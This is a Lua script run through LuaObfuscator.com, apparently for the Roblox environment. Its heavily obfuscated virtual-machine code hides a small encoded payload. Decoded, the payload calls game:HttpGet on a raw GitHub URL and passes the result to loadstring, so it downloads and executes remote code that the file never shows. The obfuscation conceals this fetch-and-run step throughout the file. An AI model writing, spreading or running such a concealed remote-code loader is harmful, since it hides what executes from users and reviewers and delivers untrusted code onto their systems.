--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v97=v5(v84,v19);v19=nil;return v97;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-((1639 -(1523 + 114)) -1))))%(((3 -0) -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%((838 + 94) -(857 + 74))) ;else local v86=(1633 -(68 + 997)) -(367 + 201) ;local v87;while true do if (v86==0) then v87=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -((1552 -(226 + 1044)) + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -((58 -26) + 85))) then return (v37 * ((601 -(87 + 263)) + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + ((1139 -(67 + 113)) -(892 + 65)) );v18=v18 + ((3 + 1) -2) ;v35=1 -0 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (12338840 + 4438376)) + (v41 * (260471 -194935)) + (v40 * (1208 -((1799 -(915 + 82)) + 150))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1,12 + (438 -(44 + 386)) ) * ((2 -0)^(1219 -(1069 + (1604 -(998 + 488)))))) + v43 ;local v47=v20(v44,21,70 -39 );local v48=((v20(v44,69 -37 )==1) and  -(1 + 0)) or (1 + 0) ;if (v47==(0 -(0 + 0))) then if (v46==(0 + 0)) then return v48 * (791 -(368 + 423)) ;else v47=3 -2 ;v45=18 -((782 -(201 + 571)) + 8) ;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -1)^(490 -(145 + 293))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 120 -(30 + 90) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if (v68~=0) then else if (v52==(1 + 2)) then for v98= #"|",v23() do local v99=(function() return v21();end)();if (v20(v99, #"\\", #"\\")==0) then local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v105==(2 + 0)) then while true do if ((2 + 0)~=v106) then else local v164=(function() return 0 -0 ;end)();while true do if ((0 -0)==v164) then if (v20(v108, #"!", #",")== #"~") then v109[2]=(function() return v59[v109[2]];end)();end if (v20(v108,5 -3 ,2)~= #"}") then else v109[ #"asd"]=(function() return v59[v109[ #"gha"]];end)();end v164=(function() return 1 + 0 ;end)();end if ((1 + 0)==v164) then v106=(function() return  #"asd";end)();break;end end end if (v106~= #"!") then else local v165=(function() return 396 -(115 + 281) ;end)();local v166=(function() return;end)();while true do if (v165==(0 -0)) then v166=(function() return 0;end)();while true do if (v166==(1 + 0)) then v106=(function() return 4 -2 ;end)();break;end if (v166~=0) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==0) then local v180=(function() return 867 -(550 + 317) ;end)();local v181=(function() return;end)();while true do if (v180==(0 -0)) then v181=(function() return 0;end)();while true do if (v181==(0 -0)) then v109[ #"91("]=(function() return v22();end)();v109[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v107== #"[") then v109[ #"19("]=(function() return v23();end)();elseif (v107==2) then v109[ #"xxx"]=(function() return v23() -((5 -3)^(301 -(134 + 151))) ;end)();elseif (v107== #"xnx") then local v186=(function() return 1665 -(970 + 695) ;end)();local v187=(function() return;end)();while true do if (v186==0) then v187=(function() return 0 -0 ;end)();while true do if (v187~=0) then else v109[ #"-19"]=(function() return v23() -((1992 -(582 + 1408))^16) ;end)();v109[ #"0836"]=(function() return v22();end)();break;end end break;end end end v166=(function() return 3 -2 ;end)();end end break;end end end if (v106== #"19(") then if (v20(v108, #"-19", #"xxx")~= #"\\") then else v109[ #"0836"]=(function() return v59[v109[ #"0836"]];end)();end v54[v98]=(function() return v109;end)();break;end if (v106~=0) then else local v168=(function() return 0 -0 ;end)();while true do if (v168==(3 -2)) then v106=(function() return  #"/";end)();break;end if (v168==0) then v107=(function() return v20(v99,1826 -(1195 + 629) , #"xxx");end)();v108=(function() return v20(v99, #"xnxx",7 -1 );end)();v168=(function() return 1;end)();end end end end break;end if (v105~=(242 -(187 + 54))) then else local v146=(function() return 780 -(162 + 618) ;end)();local v147=(function() return;end)();while true do if (v146~=0) then else v147=(function() return 0 + 0 ;end)();while true do if (v147==0) then v108=(function() return nil;end)();v109=(function() return nil;end)();v147=(function() return 1;end)();end if (v147==1) then v105=(function() return 2 + 0 ;end)();break;end end break;end end end if (v105==0) then local v148=(function() return 0 -0 ;end)();while true do if ((0 -0)==v148) then v106=(function() return 0 + 0 ;end)();v107=(function() return nil;end)();v148=(function() return 1637 -(1373 + 263) ;end)();end if ((1001 -(451 + 549))==v148) then v105=(function() return 1 + 0 ;end)();break;end end end end end end for v100= #"}",v23() do v55,v100,v28=(function() return v53(v55,v100,v28);end)();end return v57;end if (v52~=(0 -0)) then else v53=(function() return function(v101,v102,v103) local v104=(function() return 0;end)();while true do if (v104==0) then local v143=(function() return 0;end)();while true do if (v143==(0 -0)) then v101[v102-#"~" ]=(function() return v103();end)();return v101,v102,v103;end end end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 1;end)();end v68=(function() return 1;end)();end if (v68==1) then if (v52~=(1385 -(746 + 638))) then else local v95=(function() return 0;end)();while true do if (v95==(0 + 0)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v95=(function() return 1;end)();end if (v95==(1 -0)) then v58=(function() return v23();end)();v52=(function() return 343 -(218 + 123) ;end)();break;end end end if (v52~=2) then else local v96=(function() return 1581 -(1535 + 46) ;end)();while true do if (v96~=(0 + 0)) then else v59=(function() return {};end)();for v111= #"!",v58 do local v112=(function() return 0;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==0) then v113=(function() return 0;end)();v114=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end if (v112~=1) then else v115=(function() return nil;end)();while true do if (v113==(561 -(306 + 254))) then if (v114== #"[") then v115=(function() return v21()~=0 ;end)();elseif (v114==2) then v115=(function() return v24();end)();elseif (v114~= #"91(") then else v115=(function() return v25();end)();end v59[v111]=(function() return v115;end)();break;end if (v113==(0 + 0)) then local v175=(function() return 0;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 0;end)();while true do if (v176~=1) then else v113=(function() return 1;end)();break;end if (v176==0) then v114=(function() return v21();end)();v115=(function() return nil;end)();v176=(function() return 1 -0 ;end)();end end break;end end end end break;end end end v96=(function() return 1468 -(899 + 568) ;end)();end if (v96==1) then v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 3;end)();break;end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2 + 0 ];local v65=v60[7 -4 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=(2739 -2135) -(268 + 335) ;local v74= -((228 + 63) -(14 + 46 + (1207 -(553 + 424))));local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 + (126 -(116 + 10)) ];else v79[v88]=v76[v88 + ((108 + 1349) -((532 -250) + 1174)) ];end end local v80=(v77-v71) + (812 -(569 + 242)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[2 -1 ];if ((518<902) and (v82<=(1 + 7))) then if ((2994>858) and (v82<=(1027 -((1444 -(542 + 196)) + 281 + 37)))) then if ((v82<=((2683 -1431) -(721 + 530))) or (3755<=915)) then if ((3946>3743) and (v82>(1271 -(945 + 326)))) then local v116=v81[(4 + 0) -2 ];local v117,v118=v72(v79[v116](v13(v79,v116 + 1 + 0 + 0 ,v81[703 -(80 + 191 + 429) ])));v74=(v118 + v116) -1 ;local v119=0 + 0 ;for v144=v116,v74 do local v145=0;while true do if (v145==(1500 -(1408 + 92))) then v119=v119 + (1087 -(461 + 625)) ;v79[v144]=v117[v119];break;end end end else v79[v81[1290 -(423 + 570 + 295) ]]();end elseif ((v82>(1 + 1)) or (1335>=3306)) then local v120=v81[1173 -(213 + 205 + 753) ];local v121=v79[v81[3]];v79[v120 + 1 + 0 ]=v121;v79[v120]=v121[v81[1 + 2 + 1 ]];else v79[v81[1 + 1 ]]={};end elseif ((4844>2253) and (v82<=(2 + 3))) then if (v82>(533 -(406 + 71 + 52))) then v79[v81[1771 -(1749 + 20) ]]=v81[1 + 2 ];else v79[v81[1324 -(1249 + 73) ]]=v81[2 + 1 ]~=(1145 -(466 + 679)) ;end elseif (v82<=(14 -8)) then v79[v81[5 -(6 -3) ]]=v62[v81[3]];elseif (v82>(1907 -((278 -172) + 1794))) then v79[v81[1 + 1 ]]=v81[1 + (4 -2) ]~=(0 -0) ;else do return;end end elseif ((452==452) and (1623<=1957) and (v82<=(32 -20))) then if (v82<=10) then if (v82>(123 -((11 -7) + 110))) then local v131=584 -(57 + 527) ;local v132;while true do if (v131==(1427 -((1592 -(1126 + 425)) + 1386))) then v132=v81[105 -(17 + 86) ];v79[v132]=v79[v132](v13(v79,v132 + 1 ,v74));break;end end else local v133=v81[2];v79[v133]=v79[v133](v13(v79,v133 + 1 + (0 -0) ,v74));end elseif (v82==11) then local v135=0 -0 ;local v136;local v137;local v138;local v139;while true do if (v135==(405 -(118 + 287))) then v136=v81[(19 -14) -3 ];v137,v138=v72(v79[v136](v13(v79,v136 + (167 -(122 + 44)) ,v81[5 -2 ])));v135=(14 -11) -2 ;end if (((4412==4412) and (v135==(2 + 0))) or (4557<2087)) then for v161=v136,v74 do v139=v139 + 1 + (753 -(239 + 514)) ;v79[v161]=v137[v139];end break;end if (v135==(1 -0)) then v74=(v138 + v136) -1 ;v139=65 -(30 + 35) ;v135=2 + 0 ;end end else v79[v81[2]]();end elseif (v82<=(1271 -(367 + 676 + 214))) then if ((1750>=842) and (v82==(48 -(1364 -(797 + 532))))) then do return;end else v79[v81[1214 -(323 + (2010 -(118 + 1003))) ]]={};end elseif ((4372>1850) and (v82<=((30 + 10) -25))) then v79[v81[582 -(361 + 219) ]]=v62[v81[323 -(53 + 267) ]];elseif (v82==16) then local v150=0;local v151;local v152;while true do if ((232<821) and (v150==(1 + 0))) then v79[v151 + 1 ]=v152;v79[v151]=v152[v81[(1220 -803) -(15 + 398) ]];break;end if (v150==((2308 -1326) -(18 + 964))) then v151=v81[2];v152=v79[v81[11 -8 ]];v150=1;end end else v79[v81[(379 -(142 + 235)) + 0 ]]=v81[2 + (1203 -(373 + 829)) ];end v73=v73 + (851 -(20 + (1561 -(476 + 255)))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5969746F6E2Q32332F676F2F726566732F68656164732F6D61696E2F626F74676F000A4Q000E7Q00120F000100013Q00120F000200023Q002010000200020003001205000400044Q0004000500014Q0001000200054Q000A00013Q00022Q000C0001000100012Q000D3Q00017Q00",v9(),...);
